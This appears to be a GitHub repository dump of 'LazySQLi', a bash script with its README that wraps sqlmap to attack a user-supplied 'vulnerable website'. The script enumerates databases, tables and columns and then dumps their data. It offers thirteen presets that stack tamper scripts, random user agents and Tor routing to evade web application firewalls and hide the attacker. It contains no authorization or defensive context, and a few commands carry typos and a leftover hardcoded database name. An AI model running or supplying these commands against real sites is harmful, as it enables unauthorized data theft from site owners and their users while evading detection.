├── LazySqli └── README.md /LazySqli: -------------------------------------------------------------------------------- 1 | #!/data/data/com.termux/files/usr/bin/bash 2 | 3 | echo "#############################" 4 | echo "# LazySQLi #" 5 | echo "# An Advance SQLi Tool #" 6 | echo "# Coded By C1PH3R #" 7 | echo "#############################" 8 | echo "" 9 | echo "" 10 | echo "Please select an option :" 11 | echo "" 12 | echo "1. Install the requirements" 13 | echo "2. Start the tool" 14 | read OPT 15 | if [ "$OPT" -eq 1 ] 16 | then 17 | git clone https://github.com/sqlmapproject/sqlmap 18 | pkg install python2 -y 19 | clear 20 | echo "Succesfully installed :) Now run the tool again and select option 2" 21 | elif [ "$OPT" -eq 2 ] 22 | then 23 | clear 24 | echo "#############################" 25 | echo "# LazySQLi #" 26 | echo "# An Advance SQLi Tool #" 27 | echo "# Coded By C1PH3R #" 28 | echo "#############################" 29 | echo "" 30 | PS3='Please enter your choice: ' 31 | options=("Normal injection" "Waf bypass 1" "Waf bypass 2" "Waf bypass 3" "Waf bypass 4" "Waf bypass 5" "Waf bypass 6" "Waf bypass 7" "Waf bypass 8" "Waf bypass 9" "Waf bypass 10" "Waf bypass 11" "Waf bypass 12" "Waf bypass 13" "Wizard mode" "Quit") 32 | select opt in "${options[@]}" 33 | do 34 | case $opt in 35 | "Normal injection") 36 | echo "Enter vulnerable website link :" 37 | read site 38 | cd sqlmap 39 | python2 sqlmap.py -u $site --dbs 40 | echo "Enter the name of the database you got from sqlmap" 41 | read db 42 | python2 sqlmap.py -u $site -D $db --tables 43 | echo "enter the table to view its columns" 44 | read tb 45 | python2 sqlmap.py -u $site -D $db -T $tb --columns 46 | echo "Enter the column to dump data use , (comma) for multiple columns :" 47 | read col 48 | python2 sqlmap.py -u $site -D $db -T $tb -C $col --dump 49 | ;; 50 | "Waf bypass 1") 51 | echo "Enter vulnerable website link :" 52 | read site 53 | cd sqlmap 54 | python2 sqlmap.py -u "$site" --level=5 --risk=3 --random-agent --user-agent -v3 --batch --threads=10 --dbs 55 | echo "Enter the name of the database you got from sqlmap" 56 | read db 57 | python2 sqlmap.py -u "$site" --level=5 --risk=3 --random-agent --user-agent -v3 --batch --threads=10 -D $db --tables 58 | echo "enter the table to view its columns" 59 | read tb 60 | python2 sqlmap.py -u "$site" --level=5 --risk=3 --random-agent --user-agent -v3 --batch --threads=10 -D $db -T $tb --columns 61 | echo "Enter the column to dump data use , (comma) for multiple columns :" 62 | read col 63 | python2 sqlmap.py -u "$site" --level=5 --risk=3 --random-agent --user-agent -v3 --batch --threads=10 -D $db -T $tb -C $col --dump 64 | ;; 65 | "Waf bypass 2") 66 | echo "Enter vulnerable website link :" 67 | read site 68 | cd sqlmap 69 | python2 sqlmap.py -u "$site" --dbms="MySQL" -v3 --technique U --tamper="space2mysqlblank.py" --dbs 70 | echo "Enter the name of the database you got from sqlmap" 71 | read db 72 | python2 sqlmap.py -u "$site" --dbms="MySQL" -v3 --technique U --tamper="space2mysqlblank.py" -D $db --tables 73 | echo "enter the table to view its columns" 74 | read tb 75 | python2 sqlmap.py -u "$site" --dbms="MySQL" -v3 --technique U --tamper="space2mysqlblank.py" -D $db -T $tb --columns 76 | echo "Enter the column to dump data use , (comma) for multiple columns :" 77 | read col 78 | python2 sqlmap.py -u "$site" --dbms="MySQL" -v3 --technique U --tamper="space2mysqlblank.py" -D $db -T $tb -C $col --dump 79 | ;; 80 | "Waf bypass 3") 81 | echo "Enter vulnerable website link :" 82 | read site 83 | cd sqlmap 84 | python2 sqlmap.py -u "$site" --dbms="MySQL" -v3 --technique U --tamper="space2comment" --dbs 85 | echo "Enter the name of the database you got from sqlmap" 86 | read db 87 | python2 sqlmap.py -u "$site" --dbms="MySQL" -v3 --technique U --tamper="space2comment" -D $db --tables 88 | echo "enter the table to view its columns" 89 | read tb 90 | python2 sqlmap.py -u "$site" --dbms="MySQL" -v3 --technique U --tamper="space2comment" -D $db -T $tb --columns 91 | echo "Enter the column to dump data use , (comma) for multiple columns :" 92 | read col 93 | python2 sqlmap.py -u "$site" --dbms="MySQL" -v3 --technique U --tamper="space2comment" -D $db -T $tb -C $col --dump 94 | ;; 95 | "Waf bypass 4") 96 | echo "Enter vulnerable website link :" 97 | read site 98 | cd sqlmap 99 | python2 sqlmap.py -u "$site" -v3 --technique=T --no-cast --fresh-queries --banner --dbs 100 | echo "Enter the name of the database you got from sqlmap" 101 | read db 102 | python2 sqlmap.py -u "$site" -v3 --technique=T --no-cast --fresh-queries --banner -D $db --tables 103 | echo "enter the table to view its columns" 104 | read tb 105 | python2 sqlmap.py -u "$site" -v3 --technique=T --no-cast --fresh-queries --banner -D $db -T $tb --columns 106 | echo "Enter the column to dump data use , (comma) for multiple columns :" 107 | read col 108 | python2 sqlmap.py -u "$site" -v3 --technique=T --no-cast --fresh-queries --banner -D $db -T $tb -C $col --dump 109 | ;; 110 | "Waf bypass 5") 111 | echo "Enter vulnerable website link :" 112 | read site 113 | cd sqlmap 114 | python2 sqlmap.py -u "$site" --identify-waf --random-agent -v 3 --tamper="between,randomcase,space2comment" --dbs 115 | echo "Enter the name of the database you got from sqlmap" 116 | read db 117 | python2 sqlmap.py -u "$site" --identify-waf --random-agent -v 3 --tamper="between,randomcase,space2comment" -D $db --tables 118 | echo "enter the table to view its columns" 119 | read tb 120 | python2 sqlmap.py -u "$site" --identify-waf --random-agent -v 3 --tamper="between,randomcase,space2comment" -D $db -T $tb --columns 121 | echo "Enter the column to dump data use , (comma) for multiple columns :" 122 | read col 123 | python2 sqlmap.py -u "$site" --identify-waf --random-agent -v 3 --tamper="between,randomcase,space2comment" -D $db -T $tb -C $col --dump 124 | ;; 125 | "Waf bypass 6") 126 | echo "Enter vulnerable website link :" 127 | read site 128 | cd sqlmap 129 | python2 sqlmap.py -u "$site" --parse-errors -v 3 --current-user --is-dba --banner -D eeaco_gm -T #__tabulizer_user_preferences --column --random-agent --level=5 --risk=3 --dbs 130 | echo "Enter the name of the database you got from sqlmap" 131 | read db 132 | python2 sqlmap.py -u "$site" --parse-errors -v 3 --current-user --is-dba --banner -D eeaco_gm -T #__tabulizer_user_preferences --column --random-agent --level=5 --risk=3 -D $db --tables 133 | echo "enter the table to view its columns" 134 | read tb 135 | python2 sqlmap.py -u "$site" --parse-errors -v 3 --current-user --is-dba --banner -D eeaco_gm -T #__tabulizer_user_preferences --column --random-agent --level=5 --risk=3 -D $db -T $tb --columns 136 | echo "Enter the column to dump data use , (comma) for multiple columns :" 137 | read col 138 | python2 sqlmap.py -u "$site" --parse-errors -v 3 --current-user --is-dba --banner -D eeaco_gm -T #__tabulizer_user_preferences --column --random-agent --level=5 --risk=3 -D $db -T $tb -C $col --dump 139 | ;; 140 | "Waf bypass 7") 141 | echo "Enter vulnerable website link :" 142 | read site 143 | cd sqlmap 144 | python2 sqlmap.py -u "$site" --tamper=between,modsecurityversioned,modsecurityzeroversioned,charencode,greatest --identify-waf --random-agent --dbs 145 | echo "Enter the name of the database you got from sqlmap" 146 | read db 147 | python2 sqlmap.py -u "$site" --tamper=between,modsecurityversioned,modsecurityzeroversioned,charencode,greatest --identify-waf --random-agent -D $db --tables 148 | echo "enter the table to view its columns" 149 | read tb 150 | python2 sqlmap.py -u "$site" --tamper=between,modsecurityversioned,modsecurityzeroversioned,charencode,greatest --identify-waf --random-agent -D $db -T $tb --columns 151 | echo "Enter the column to dump data use , (comma) for multiple columns :" 152 | read col 153 | python2 sqlmap.py -u "$site" --tamper=between,modsecurityversioned,modsecurityzeroversioned,charencode,greatest --identify-waf --random-agent -D $db -T $tb -C $col --dump 154 | ;; 155 | "Waf bypass 8") 156 | echo "Enter vulnerable website link :" 157 | read site 158 | cd sqlmap 159 | python2 sqlmap.py -u "$site" --banner --safe-url=2 --safe-freq=3 --tamper=between,randomcase,charencode -v 3 --force-ssl --dbs --threads=10 --level=2 --risk=2 --dbs 160 | echo "Enter the name of the database you got from sqlmap" 161 | read db 162 | python2 sqlmap.py -u "$site" --banner --safe-url=2 --safe-freq=3 --tamper=between,randomcase,charencode -v 3 --force-ssl --dbs --threads=10 --level=2 --risk=2 -D $db --tables 163 | echo "enter the table to view its columns" 164 | read tb 165 | python2 sqlmap.py -u "$site" --banner --safe-url=2 --safe-freq=3 --tamper=between,randomcase,charencode -v 3 --force-ssl --dbs --threads=10 --level=2 --risk=2 -D $db -T $tb --columns 166 | echo "Enter the column to dump data use , (comma) for multiple columns :" 167 | read col 168 | python2 sqlmap.py -u "$site" --banner --safe-url=2 --safe-freq=3 --tamper=between,randomcase,charencode -v 3 --force-ssl --dbs --threads=10 --level=2 --risk=2 -D $db -T $tb -C $col --dump 169 | ;; 170 | "Waf bypass 9") 171 | echo "Enter vulnerable website link :" 172 | read site 173 | cd sqlmap 174 | python2 sqlmap.py -u "$site" --level=5 --risk=3 --random-agent --tamper=between,charencode,charunicodeencode,equaltolike,greatest,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,sp_password,space2comment,space2dash,space2mssqlblank,space2mysqldash,space2plus,space2randomblank,unionalltounion,unmagicquotes --dbms=mssql --dbs 175 | echo "Enter the name of the database you got from sqlmap" 176 | read db 177 | python2 sqlmap.py -u "$site" --level=5 --risk=3 --random-agent --tamper=between,charencode,charunicodeencode,equaltolike,greatest,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,sp_password,space2comment,space2dash,space2mssqlblank,space2mysqldash,space2plus,space2randomblank,unionalltounion,unmagicquotes --dbms=mssql -D $db --tables 178 | echo "enter the table to view its columns" 179 | read tb 180 | python2 sqlmap.py -u "$site" --level=5 --risk=3 --random-agent --tamper=between,charencode,charunicodeencode,equaltolike,greatest,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,sp_password,space2comment,space2dash,space2mssqlblank,space2mysqldash,space2plus,space2randomblank,unionalltounion,unmagicquotes --dbms=mssql -D $db -T $tb --columns 181 | echo "Enter the column to dump data use , (comma) for multiple columns :" 182 | read col 183 | python2 sqlmap.py -u "$site" --level=5 --risk=3 --random-agent --tamper=between,charencode,charunicodeencode,equaltolike,greatest,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,sp_password,space2comment,space2dash,space2mssqlblank,space2mysqldash,space2plus,space2randomblank,unionalltounion,unmagicquotes --dbms=mssql -D $db -T $tb -C $col --dump 184 | ;; 185 | "Waf bypass 10") 186 | echo "Enter vulnerable website link :" 187 | read site 188 | cd sqlmap 189 | python2 sqlmap.py -u "$site" --level 5 --risk 3 tamper=between,bluecoat,charencode,charunicodeencode,concat2concatws,equaltolike,greatest,halfversionedmorekeywords,ifnull2ifisnull,modsecurityversioned,modsecurityzeroversioned,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,space2comment,space2hash,space2morehash,space2mysqldash,space2plus,space2randomblank,unionalltounion,unmagicquotes,versionedkeywords,versionedmorekeywords,xforwardedfor --dbms=mssql --dbs 190 | echo "Enter the name of the database you got from sqlmap" 191 | read db 192 | python2 sqlmap.py -u "$site" --level 5 --risk 3 tamper=between,bluecoat,charencode,charunicodeencode,concat2concatws,equaltolike,greatest,halfversionedmorekeywords,ifnull2ifisnull,modsecurityversioned,modsecurityzeroversioned,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,space2comment,space2hash,space2morehash,space2mysqldash,space2plus,space2randomblank,unionalltounion,unmagicquotes,versionedkeywords,versionedmorekeywords,xforwardedfor --dbms=mssql -D $db --tables 193 | echo "enter the table to view its columns" 194 | read tb 195 | python2 sqlmap.py -u "$site" --level 5 --risk 3 tamper=between,bluecoat,charencode,charunicodeencode,concat2concatws,equaltolike,greatest,halfversionedmorekeywords,ifnull2ifisnull,modsecurityversioned,modsecurityzeroversioned,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,space2comment,space2hash,space2morehash,space2mysqldash,space2plus,space2randomblank,unionalltounion,unmagicquotes,versionedkeywords,versionedmorekeywords,xforwardedfor --dbms=mssql -D $db -T $tb --columns 196 | echo "Enter the column to dump data use , (comma) for multiple columns :" 197 | read col 198 | python2 sqlmap.py -u "$site" --level 5 --risk 3 tamper=between,bluecoat,charencode,charunicodeencode,concat2concatws,equaltolike,greatest,halfversionedmorekeywords,ifnull2ifisnull,modsecurityversioned,modsecurityzeroversioned,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,space2comment,space2hash,space2morehash,space2mysqldash,space2plus,space2randomblank,unionalltounion,unmagicquotes,versionedkeywords,versionedmorekeywords,xforwardedfor --dbms=mssql -D $db -T $tb -C $col --dump 199 | ;; 200 | "Waf bypass 11") 201 | echo "Enter vulnerable website link :" 202 | read site 203 | cd sqlmap 204 | python2 sqlmap.py -u "$site" --level 5 --risk 3 tamper=apostrophemask,apostrophenullencode,base64encode,between,chardoubleencode,charencode,charunicodeencode,equaltolike,greatest,ifnull2ifisnull,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,space2comment,space2plus,space2randomblank,unionalltounion,unmagicquotes --dbms=mssql --dbs 205 | echo "Enter the name of the database you got from sqlmap" 206 | read db 207 | python2 sqlmap.py -u "$site" --level 5 --risk 3 tamper=apostrophemask,apostrophenullencode,base64encode,between,chardoubleencode,charencode,charunicodeencode,equaltolike,greatest,ifnull2ifisnull,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,space2comment,space2plus,space2randomblank,unionalltounion,unmagicquotes --dbms=mssql -D $db --tables 208 | echo "enter the table to view its columns" 209 | read tb 210 | python2 sqlmap.py -u "$site" --level 5 --risk 3 tamper=apostrophemask,apostrophenullencode,base64encode,between,chardoubleencode,charencode,charunicodeencode,equaltolike,greatest,ifnull2ifisnull,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,space2comment,space2plus,space2randomblank,unionalltounion,unmagicquotes --dbms=mssql -D $db -T $tb --columns 211 | echo "Enter the column to dump data use , (comma) for multiple columns :" 212 | read col 213 | python2 sqlmap.py -u "$site" --level 5 --risk 3 tamper=apostrophemask,apostrophenullencode,base64encode,between,chardoubleencode,charencode,charunicodeencode,equaltolike,greatest,ifnull2ifisnull,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,space2comment,space2plus,space2randomblank,unionalltounion,unmagicquotes --dbms=mssql -D $db -T $tb -C $col --dump 214 | ;; 215 | "Waf bypass 12") 216 | echo "Enter vulnerable website link :" 217 | read site 218 | cd sqlmap 219 | python2 sqlmap.py -u "$site" --level=5 --risk=3 -p "id" –-tamper="apostrophemask,apostrophenullencode,appendnullbyte,base64encode,between,bluecoat,chardoubleencode,charencode,charunicodeencode,concat2concatws,equaltolike,greatest,halfversionedmorekeywords,ifnull2ifisnull,modsecurityversioned,modsecurityzeroversioned,multiplespaces,nonrecursivereplacement,percentage,randomcase,randomcomments,securesphere,space2comment,space2dash,space2hash,space2morehash,space2mssqlblank,space2mssqlhash,space2mysqlblank,space2mysqldash,space2plus,space2randomblank,sp_password,unionalltounion,unmagicquotes,versionedkeywords,versionedmorekeywords" --dbs 220 | echo "Enter the name of the database you got from sqlmap" 221 | read db 222 | python2 sqlmap.py -u "$site" --level=5 --risk=3 -p "id" –-tamper="apostrophemask,apostrophenullencode,appendnullbyte,base64encode,between,bluecoat,chardoubleencode,charencode,charunicodeencode,concat2concatws,equaltolike,greatest,halfversionedmorekeywords,ifnull2ifisnull,modsecurityversioned,modsecurityzeroversioned,multiplespaces,nonrecursivereplacement,percentage,randomcase,randomcomments,securesphere,space2comment,space2dash,space2hash,space2morehash,space2mssqlblank,space2mssqlhash,space2mysqlblank,space2mysqldash,space2plus,space2randomblank,sp_password,unionalltounion,unmagicquotes,versionedkeywords,versionedmorekeywords" -D $db --tables 223 | echo "enter the table to view its columns" 224 | read tb 225 | python2 sqlmap.py -u "$site" --level=5 --risk=3 -p "id" –-tamper="apostrophemask,apostrophenullencode,appendnullbyte,base64encode,between,bluecoat,chardoubleencode,charencode,charunicodeencode,concat2concatws,equaltolike,greatest,halfversionedmorekeywords,ifnull2ifisnull,modsecurityversioned,modsecurityzeroversioned,multiplespaces,nonrecursivereplacement,percentage,randomcase,randomcomments,securesphere,space2comment,space2dash,space2hash,space2morehash,space2mssqlblank,space2mssqlhash,space2mysqlblank,space2mysqldash,space2plus,space2randomblank,sp_password,unionalltounion,unmagicquotes,versionedkeywords,versionedmorekeywords" -D $db -T $tb --columns 226 | echo "Enter the column to dump data use , (comma) for multiple columns :" 227 | read col 228 | python2 sqlmap.py -u "$site" --level=5 --risk=3 -p "id" –-tamper="apostrophemask,apostrophenullencode,appendnullbyte,base64encode,between,bluecoat,chardoubleencode,charencode,charunicodeencode,concat2concatws,equaltolike,greatest,halfversionedmorekeywords,ifnull2ifisnull,modsecurityversioned,modsecurityzeroversioned,multiplespaces,nonrecursivereplacement,percentage,randomcase,randomcomments,securesphere,space2comment,space2dash,space2hash,space2morehash,space2mssqlblank,space2mssqlhash,space2mysqlblank,space2mysqldash,space2plus,space2randomblank,sp_password,unionalltounion,unmagicquotes,versionedkeywords,versionedmorekeywords" -D $db -T $tb -C $col --dump 229 | ;; 230 | "Waf bypass 13") 231 | echo "Enter vulnerable website link :" 232 | read site 233 | cd sqlmap 234 | python2 sqlmap.py -u "$site" --tamper "randomcase.py" --tor --tor-type=SOCKS5 --tor-port=9050 --dbs --dbms "MySQL" --current-db --random-agent --dbs 235 | echo "Enter the name of the database you got from sqlmap" 236 | read db 237 | python2 sqlmap.py -u "$site" --tamper "randomcase.py" --tor --tor-type=SOCKS5 --tor-port=9050 --dbs --dbms "MySQL" --current-db --random-agent -D $db --tables 238 | echo "enter the table to view its columns" 239 | read tb 240 | python2 sqlmap.py -u "$site" --tamper "randomcase.py" --tor --tor-type=SOCKS5 --tor-port=9050 --dbs --dbms "MySQL" --current-db --random-agent -D $db -T $tb --columns 241 | echo "Enter the column to dump data use , (comma) for multiple columns :" 242 | read col 243 | python2 sqlmap.py -u "$site" --tamper "randomcase.py" --tor --tor-type=SOCKS5 --tor-port=9050 --dbs --dbms "MySQL" --current-db --random-agent -D $db -T $tb -C $col --dump 244 | ;; 245 | "Wizard mode") 246 | cd sqlmap 247 | python2 sqlmap.py --wizard 248 | ;; 249 | "Quit") 250 | echo "Thankyou for using my tool :)" 251 | echo "© Ashish Rohra" 252 | break 253 | ;; 254 | *) echo "invalid option $REPLY";; 255 | esac 256 | done 257 | else 258 | echo "Dude you are drunk !! select a valid option mate" 259 | fi -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # LazySQLi 2 | Sqlmap for lazy people 3 | 4 | An advanced sql injection tools that work with sqlmap to make it more effective. It has more than 12 tamper scripts pre-commanded to run on single click. 5 | 6 | # How to install 7 | To install it in Kali linux and other linux operating systems please refer to this article - https://www.kalilinux.in/2019/03/advanced-sql-injection-in-easy-stapes.html 8 | 9 | To install this tool in termux, copy paste the following commands 10 | 11 | 1. git clone https://github.com/cipherhexx/LazySQLi 12 | 2. cd LazySQLi 13 | 3. chmod +x LazySqli 14 | 4. ./LazySqli 15 | 16 | there are no requirements needed :) it will install everything so for the first start it will take 2-3 minutes to start but then next time it will run instantly 17 | 18 | --------------------------------------------------------------------------------